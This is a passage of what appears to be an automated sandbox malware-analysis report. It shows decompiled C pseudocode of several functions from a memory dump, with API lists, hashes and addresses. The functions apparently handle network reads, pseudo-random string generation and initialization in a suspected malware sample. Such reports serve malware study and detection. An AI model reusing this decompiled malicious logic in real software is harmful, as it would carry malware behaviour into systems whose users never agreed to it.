                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 507476733-0
                                                                                                                                  • Opcode ID: bdc7ac6719fccd8e4286f9862cf1da6557f7642664b559fecd19b41b9697c70f
                                                                                                                                  • Instruction ID: f118e1064bc23aee8e5dedf86407a37fd26720c2b46c150cc79e4219b42dce88
                                                                                                                                  • Opcode Fuzzy Hash: bdc7ac6719fccd8e4286f9862cf1da6557f7642664b559fecd19b41b9697c70f
                                                                                                                                  • Instruction Fuzzy Hash: 4011C67EA45F046BD724AB78EC19F5A76AC9B4C353F040525FA09C6280EBB0D48186B0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E031A4F07(void* __eax) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t41;
                                                                                                                                  				char* _t42;
                                                                                                                                  				long _t43;
                                                                                                                                  				void* _t46;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                  				char _t50;
                                                                                                                                  				long _t54;
                                                                                                                                  				char* _t55;
                                                                                                                                  				long _t56;
                                                                                                                                  				intOrPtr* _t57;
                                                                                                                                  				void* _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				void* _t74;
                                                                                                                                  				void* _t78;
                                                                                                                                  
                                                                                                                                  				_t72 = __eax;
                                                                                                                                  				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t41 = _t72;
                                                                                                                                  					_pop(_t73);
                                                                                                                                  					_t74 = _t41;
                                                                                                                                  					_t42 =  &_v12;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                                                                                                                                  					if(_t42 == 0) {
                                                                                                                                  						_t43 = GetLastError();
                                                                                                                                  						_v8 = _t43;
                                                                                                                                  						if(_t43 == 0x2efe) {
                                                                                                                                  							_v8 = 0;
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							L29:
                                                                                                                                  							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t46 =  *0x31ad130(0, 1,  &_v24); // executed
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_v8 = 8;
                                                                                                                                  							} else {
                                                                                                                                  								_t47 = E031A75F6(0x1000);
                                                                                                                                  								_v20 = _t47;
                                                                                                                                  								if(_t47 == 0) {
                                                                                                                                  									_v8 = 8;
                                                                                                                                  								} else {
                                                                                                                                  									goto L8;
                                                                                                                                  									do {
                                                                                                                                  										while(1) {
                                                                                                                                  											L8:
                                                                                                                                  											_t50 = _v12;
                                                                                                                                  											if(_t50 >= 0x1000) {
                                                                                                                                  												_t50 = 0x1000;
                                                                                                                                  											}
                                                                                                                                  											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                                                                                                                  											if(_t50 == 0) {
                                                                                                                                  												break;
                                                                                                                                  											}
                                                                                                                                  											_t57 = _v24;
                                                                                                                                  											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                                                                                                                  											_t18 =  &_v12;
                                                                                                                                  											 *_t18 = _v12 - _v16;
                                                                                                                                  											if( *_t18 != 0) {
                                                                                                                                  												continue;
                                                                                                                                  											} else {
                                                                                                                                  											}
                                                                                                                                  											L14:
                                                                                                                                  											if(WaitForSingleObject( *0x31ad2a4, 0) != 0x102) {
                                                                                                                                  												_v8 = 0x102;
                                                                                                                                  											} else {
                                                                                                                                  												_t55 =  &_v12;
                                                                                                                                  												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                                                                                                                                  												if(_t55 != 0) {
                                                                                                                                  													goto L19;
                                                                                                                                  												} else {
                                                                                                                                  													_t56 = GetLastError();
                                                                                                                                  													_v8 = _t56;
                                                                                                                                  													if(_t56 == 0x2f78 && _v12 == 0) {
                                                                                                                                  														_v8 = 0;
                                                                                                                                  														goto L19;
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  											L22:
                                                                                                                                  											E031A4AAB(_v20);
                                                                                                                                  											if(_v8 == 0) {
                                                                                                                                  												_t54 = E031A3B3F(_v24, _t74); // executed
                                                                                                                                  												_v8 = _t54;
                                                                                                                                  											}
                                                                                                                                  											goto L25;
                                                                                                                                  										}
                                                                                                                                  										_v8 = GetLastError();
                                                                                                                                  										goto L14;
                                                                                                                                  										L19:
                                                                                                                                  									} while (_v12 != 0);
                                                                                                                                  									goto L22;
                                                                                                                                  								}
                                                                                                                                  								L25:
                                                                                                                                  								_t48 = _v24;
                                                                                                                                  								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _v8;
                                                                                                                                  				} else {
                                                                                                                                  					_t60 = E031A121A(__eax); // executed
                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                  						return _t60;
                                                                                                                                  					} else {
                                                                                                                                  						goto L2;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 031A76AF
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A76CF
                                                                                                                                    • Part of subcall function 031A121A: wcstombs.NTDLL ref: 031A12DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2344289193-3251738875
                                                                                                                                  • Opcode ID: 3a87d8566259c3337b0ab61381cb28b543875b241abe050195e18b4737da7281
                                                                                                                                  • Instruction ID: a97a4f2de2a1c9bbd28f1e7a04dc6b0a14545885d0fb6981fb1329befdd005d2
                                                                                                                                  • Opcode Fuzzy Hash: 3a87d8566259c3337b0ab61381cb28b543875b241abe050195e18b4737da7281
                                                                                                                                  • Instruction Fuzzy Hash: 19410079900A05EFDF14EFECD988AADB7B9FB0C346F1444A9E405E7151D7309A80DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                  			E031A9311(void** __esi) {
                                                                                                                                  				intOrPtr _v0;
                                                                                                                                  				intOrPtr _t4;
                                                                                                                                  				intOrPtr _t6;
                                                                                                                                  				void* _t8;
                                                                                                                                  				void* _t9;
                                                                                                                                  				intOrPtr _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void** _t13;
                                                                                                                                  
                                                                                                                                  				_t13 = __esi;
                                                                                                                                  				_t4 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				__imp__(_t4 + 0x40);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t6 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                  					if( *_t1 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0xa);
                                                                                                                                  				}
                                                                                                                                  				_t8 =  *_t13;
                                                                                                                                  				if(_t8 != 0 && _t8 != 0x31ad030) {
                                                                                                                                  					HeapFree( *0x31ad270, 0, _t8);
                                                                                                                                  				}
                                                                                                                                  				_t9 = E031A5141(_v0, _t13); // executed
                                                                                                                                  				_t13[1] = _t9;
                                                                                                                                  				_t10 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				_t11 = _t10 + 0x40;
                                                                                                                                  				__imp__(_t11);
                                                                                                                                  				return _t11;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A931A
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,031A5390), ref: 031A9324
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,031A5390), ref: 031A934C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A9368
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 0b6c0af516e0feccb9e6d4fdd8289fd2ffda7c578cf4a75c6b7b3cb7c91c971f
                                                                                                                                  • Instruction ID: d9d1f003211ea23dea32c38068ca6d827802faac80993dc94dcbd686ec5075f3
                                                                                                                                  • Opcode Fuzzy Hash: 0b6c0af516e0feccb9e6d4fdd8289fd2ffda7c578cf4a75c6b7b3cb7c91c971f
                                                                                                                                  • Instruction Fuzzy Hash: 16F0DAB9604E40ABD728EF78EA58B177BB4BF1D343B088414B541D6595D730D8C0DB25
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E031A520D(signed int __edx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				CHAR* _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t21;
                                                                                                                                  				CHAR* _t22;
                                                                                                                                  				CHAR* _t25;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				void* _t27;
                                                                                                                                  				void* _t31;
                                                                                                                                  				void* _t32;
                                                                                                                                  				CHAR* _t36;
                                                                                                                                  				CHAR* _t42;
                                                                                                                                  				CHAR* _t43;
                                                                                                                                  				CHAR* _t44;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t51;
                                                                                                                                  				CHAR* _t54;
                                                                                                                                  				signed char _t56;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				void* _t62;
                                                                                                                                  				CHAR* _t65;
                                                                                                                                  				CHAR* _t66;
                                                                                                                                  				char* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  
                                                                                                                                  				_t61 = __edx;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t21 = E031A154A();
                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                  					_t59 =  *0x31ad294; // 0x4000000a
                                                                                                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                  					 *0x31ad294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                  				}
                                                                                                                                  				_t22 =  *0x31ad12c(0, 2); // executed
                                                                                                                                  				_v16 = _t22;
                                                                                                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                  					_t25 = E031A21DE( &_v8,  &_v20); // executed
                                                                                                                                  					_t54 = _t25;
                                                                                                                                  					_t26 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					if( *0x31ad294 > 5) {
                                                                                                                                  						_t8 = _t26 + 0x31ae5cd; // 0x4d283a53
                                                                                                                                  						_t27 = _t8;
                                                                                                                                  					} else {
                                                                                                                                  						_t7 = _t26 + 0x31ae9f9; // 0x44283a44
                                                                                                                                  						_t27 = _t7;
                                                                                                                                  					}
                                                                                                                                  					E031A11F4(_t27, _t27);
                                                                                                                                  					_t31 = E031A3598(_t61,  &_v20,  &_v12); // executed
                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                  						CloseHandle(_v20);
                                                                                                                                  					}
                                                                                                                                  					_t62 = 5;
                                                                                                                                  					if(_t54 != _t62) {
                                                                                                                                  						 *0x31ad2a8 =  *0x31ad2a8 ^ 0x81bbe65d;
                                                                                                                                  						_t32 = E031A75F6(0x60);
                                                                                                                                  						 *0x31ad364 = _t32;
                                                                                                                                  						__eflags = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							_push(8);
                                                                                                                                  							_pop(0);
                                                                                                                                  						} else {
                                                                                                                                  							memset(_t32, 0, 0x60);
                                                                                                                                  							_t49 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  							_t68 = _t68 + 0xc;
                                                                                                                                  							__imp__(_t49 + 0x40);
                                                                                                                                  							_t51 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  							 *_t51 = 0x31ae823;
                                                                                                                                  						}
                                                                                                                                  						_t54 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						if(0 == 0) {
                                                                                                                                  							_t36 = RtlAllocateHeap( *0x31ad270, 0, 0x43);
                                                                                                                                  							 *0x31ad300 = _t36;
                                                                                                                                  							__eflags = _t36;
                                                                                                                                  							if(_t36 == 0) {
                                                                                                                                  								_push(8);
                                                                                                                                  								_pop(0);
                                                                                                                                  							} else {
                                                                                                                                  								_t56 =  *0x31ad294; // 0x4000000a
                                                                                                                                  								_t61 = _t56 & 0x000000ff;
                                                                                                                                  								_t58 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  								_t13 = _t58 + 0x31ae55a; // 0x697a6f4d
                                                                                                                                  								_t55 = _t13;
                                                                                                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x31ac2a7);
                                                                                                                                  							}
                                                                                                                                  							_t54 = 0;
                                                                                                                                  							__eflags = 0;
                                                                                                                                  							if(0 == 0) {
                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                  								E031AA82B( ~_v8 &  *0x31ad2a8, 0x31ad00c); // executed
                                                                                                                                  								_t42 = E031A4C40(_t55); // executed
                                                                                                                                  								_t54 = _t42;
                                                                                                                                  								__eflags = _t54;
                                                                                                                                  								if(_t54 != 0) {
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  								_t43 = E031A74A5(); // executed
                                                                                                                                  								__eflags = _t43;
                                                                                                                                  								if(_t43 != 0) {
                                                                                                                                  									__eflags = _v8;
                                                                                                                                  									_t65 = _v12;
                                                                                                                                  									if(_v8 != 0) {
                                                                                                                                  										L29:
                                                                                                                                  										_t44 = E031A5461(_t61, _t65, _v8); // executed
                                                                                                                                  										_t54 = _t44;
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t65;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									_t54 = E031A3FC2(__eflags,  &(_t65[4]));
                                                                                                                                  									__eflags = _t54;
                                                                                                                                  									if(_t54 == 0) {
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									goto L29;
                                                                                                                                  								}
                                                                                                                                  								_t54 = 8;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t66 = _v12;
                                                                                                                                  						if(_t66 == 0) {
                                                                                                                                  							L30:
                                                                                                                                  							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                  								 *0x31ad128();
                                                                                                                                  							}
                                                                                                                                  							goto L34;
                                                                                                                                  						}
                                                                                                                                  						_t67 =  &(_t66[4]);
                                                                                                                                  						do {
                                                                                                                                  						} while (E031A5AB2(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                  					}
                                                                                                                                  					goto L30;
                                                                                                                                  				} else {
                                                                                                                                  					_t54 = _t22;
                                                                                                                                  					L34:
                                                                                                                                  					return _t54;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x031a5394
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5396
                                                                                                                                  0x031a539b
                                                                                                                                  0x031a539d
                                                                                                                                  0x031a53a4
                                                                                                                                  0x031a53a8
                                                                                                                                  0x031a53ab
                                                                                                                                  0x031a53c0
                                                                                                                                  0x031a53c4
                                                                                                                                  0x031a53c9
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53c9
                                                                                                                                  0x031a53ad
                                                                                                                                  0x031a53af
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53ba
                                                                                                                                  0x031a53bc
                                                                                                                                  0x031a53be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53be
                                                                                                                                  0x031a53a1
                                                                                                                                  0x031a53a1
                                                                                                                                  0x031a5372
                                                                                                                                  0x031a52b0
                                                                                                                                  0x031a52b0
                                                                                                                                  0x031a52b5
                                                                                                                                  0x031a53cb
                                                                                                                                  0x031a53cf
                                                                                                                                  0x031a53d7
                                                                                                                                  0x031a53d7
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53cf
                                                                                                                                  0x031a52bb
                                                                                                                                  0x031a52be
                                                                                                                                  0x031a52c8
                                                                                                                                  0x031a52cf
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53df
                                                                                                                                  0x031a53df
                                                                                                                                  0x031a53e3
                                                                                                                                  0x031a53e7
                                                                                                                                  0x031a53e7

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,031A5226,00000000,00000000), ref: 031A1559
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 031A52A3
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • memset.NTDLL ref: 031A52F2
                                                                                                                                  • RtlInitializeCriticalSection.NTDLL(05BD9570), ref: 031A5303
                                                                                                                                    • Part of subcall function 031A3FC2: memset.NTDLL ref: 031A3FD7
                                                                                                                                    • Part of subcall function 031A3FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 031A4019
                                                                                                                                    • Part of subcall function 031A3FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 031A4024
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 031A532E
                                                                                                                                  • wsprintfA.USER32 ref: 031A535E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4246211962-0
                                                                                                                                  • Opcode ID: b067c9ca8602b600b2c6fc309577ff17b9e43e2c62ae925cbacee47b1b7e335a
                                                                                                                                  • Instruction ID: 6b9aa70ddbd299cd9a3d20e233489864b1b3bbfddf10e694e0d07e0daf7a80dd
                                                                                                                                  • Opcode Fuzzy Hash: b067c9ca8602b600b2c6fc309577ff17b9e43e2c62ae925cbacee47b1b7e335a
                                                                                                                                  • Instruction Fuzzy Hash: 945115BDA08F14AFDB14EBADE894B6E73A9AF4D703F080426E541D7140E7B08584CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                  			E031A78E6(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				intOrPtr _t81;
                                                                                                                                  				char _t83;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				char _t101;
                                                                                                                                  				unsigned int _t102;
                                                                                                                                  				intOrPtr _t103;
                                                                                                                                  				char* _t107;
                                                                                                                                  				signed int _t110;
                                                                                                                                  				signed int _t113;
                                                                                                                                  				signed int _t118;
                                                                                                                                  				signed int _t122;
                                                                                                                                  				intOrPtr _t124;
                                                                                                                                  
                                                                                                                                  				_t102 = _a8;
                                                                                                                                  				_t118 = 0;
                                                                                                                                  				_v20 = __eax;
                                                                                                                                  				_t122 = (_t102 >> 2) + 1;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_a8 = 0;
                                                                                                                                  				_t81 = E031A75F6(_t122 << 2);
                                                                                                                                  				_v16 = _t81;
                                                                                                                                  				if(_t81 == 0) {
                                                                                                                                  					_push(8);
                                                                                                                                  					_pop(0);
                                                                                                                                  					L37:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_t107 = _a4;
                                                                                                                                  				_a4 = _t102;
                                                                                                                                  				_t113 = 0;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t83 =  *_t107;
                                                                                                                                  					if(_t83 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                                  						if(_t118 != 0) {
                                                                                                                                  							if(_t118 > _v8) {
                                                                                                                                  								_v8 = _t118;
                                                                                                                                  							}
                                                                                                                                  							_a8 = _a8 + 1;
                                                                                                                                  							_t118 = 0;
                                                                                                                                  						}
                                                                                                                                  						 *_t107 = 0;
                                                                                                                                  						goto L16;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t118 != 0) {
                                                                                                                                  							L10:
                                                                                                                                  							_t118 = _t118 + 1;
                                                                                                                                  							L16:
                                                                                                                                  							_t107 = _t107 + 1;
                                                                                                                                  							_t15 =  &_a4;
                                                                                                                                  							 *_t15 = _a4 - 1;
                                                                                                                                  							if( *_t15 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t113 == _t122) {
                                                                                                                                  							L21:
                                                                                                                                  							if(_a8 <= 0x20) {
                                                                                                                                  								_push(0xb);
                                                                                                                                  								L34:
                                                                                                                                  								_pop(0);
                                                                                                                                  								L35:
                                                                                                                                  								E031A4AAB(_v16);
                                                                                                                                  								goto L37;
                                                                                                                                  							}
                                                                                                                                  							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                                  							_t103 = E031A75F6((_v8 + _t24) * _a8 + 4);
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_push(8);
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t90 = _a8;
                                                                                                                                  							_a4 = _a4 & 0x00000000;
                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                  							_t124 = _t103 + _t90 * 4;
                                                                                                                                  							if(_t90 <= 0) {
                                                                                                                                  								L31:
                                                                                                                                  								 *0x31ad2b0 = _t103;
                                                                                                                                  								goto L35;
                                                                                                                                  							}
                                                                                                                                  							do {
                                                                                                                                  								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                                  								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                                  								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                                  								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                                  								_v12 = _v12 & 0x00000000;
                                                                                                                                  								if(_a4 <= 0) {
                                                                                                                                  									goto L30;
                                                                                                                                  								} else {
                                                                                                                                  									goto L26;
                                                                                                                                  								}
                                                                                                                                  								while(1) {
                                                                                                                                  									L26:
                                                                                                                                  									_t99 = _v12;
                                                                                                                                  									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                                  									if(_t99 == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									_v12 = _v12 + 1;
                                                                                                                                  									if(_v12 < _a4) {
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  								_v8 = _v8 - 1;
                                                                                                                                  								L30:
                                                                                                                                  								_t97 = _a4;
                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                  								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                                  								__imp__(_t124);
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  								_t124 = _t124 + _t97 + 1;
                                                                                                                                  							} while (_v8 < _a8);
                                                                                                                                  							goto L31;
                                                                                                                                  						}
                                                                                                                                  						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                                  						_t101 = _t83;
                                                                                                                                  						if(_t83 - 0x61 <= 0x19) {
                                                                                                                                  							_t101 = _t101 - 0x20;
                                                                                                                                  						}
                                                                                                                                  						 *_t107 = _t101;
                                                                                                                                  						_t113 = _t113 + 1;
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				if(_t118 != 0) {
                                                                                                                                  					if(_t118 > _v8) {
                                                                                                                                  						_v8 = _t118;
                                                                                                                                  					}
                                                                                                                                  					_a8 = _a8 + 1;
                                                                                                                                  				}
                                                                                                                                  				goto L21;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • lstrcpy.KERNEL32(69B25F45,00000020), ref: 031A79E3
                                                                                                                                  • lstrcat.KERNEL32(69B25F45,00000020), ref: 031A79F8
                                                                                                                                  • lstrcmp.KERNEL32(00000000,69B25F45), ref: 031A7A0F
                                                                                                                                  • lstrlen.KERNEL32(69B25F45), ref: 031A7A33
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3214092121-3916222277
                                                                                                                                  • Opcode ID: bed33bcf092650a5700e80b94a33ce157d6ca177a7f5476208124175e87a8f36
                                                                                                                                  • Instruction ID: 985da3f30a4c44dda0904d8f779aab04f3dd4f8151f718c6c025f24fd227fe31
                                                                                                                                  • Opcode Fuzzy Hash: bed33bcf092650a5700e80b94a33ce157d6ca177a7f5476208124175e87a8f36
                                                                                                                                  • Instruction Fuzzy Hash: 8351C139A04A18EBCF15DFDDC5406ADFBB6EF49326F09805AE8149B281C7319741CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 18%
                                                                                                                                  			E031A121A(void* __esi) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				long* _v20;
                                                                                                                                  				long _t36;
                                                                                                                                  				long* _t47;
                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                  				intOrPtr* _t64;
                                                                                                                                  				char* _t65;
                                                                                                                                  
                                                                                                                                  				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                                  				_t63 = __esi + 0x2c;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				 *_t63 = 0;
                                                                                                                                  				_v12 = _t36;
                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v12;
                                                                                                                                  				}
                                                                                                                                  				_v8 = 4;
                                                                                                                                  				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                  					L11:
                                                                                                                                  					_v12 = GetLastError();
